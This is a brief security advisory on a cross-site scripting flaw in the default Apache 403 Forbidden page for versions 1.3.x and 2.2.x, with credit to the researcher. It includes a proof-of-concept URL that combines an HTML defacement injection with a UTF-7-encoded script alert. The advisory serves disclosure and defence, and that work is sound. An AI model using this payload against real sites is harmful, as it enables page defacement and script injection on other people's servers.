A vulnerability in the Apache web server allows an attacker to inject an XSS payload into any Apache server that uses the default Forbidden 403 error page.

Vulnerable Systems:
* Apache version 2.2.x
* Apache version 1.3.x

After injecting this string:
http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xcscriptalert('xss')-/script--//--

You will get a Forbidden 403 error message together with an XSS alert. The string combines HTML injection with an XSS payload encoded in UTF-7.

This is only a PoC; for it to work, the browser must be set to auto-detect the page encoding so that it can select UTF-7.

Additional Information:
The information has been provided by Yaniv Miron aka "Lament".

http://www.securiteam.com/unixfocus/5TP0B00OAM.html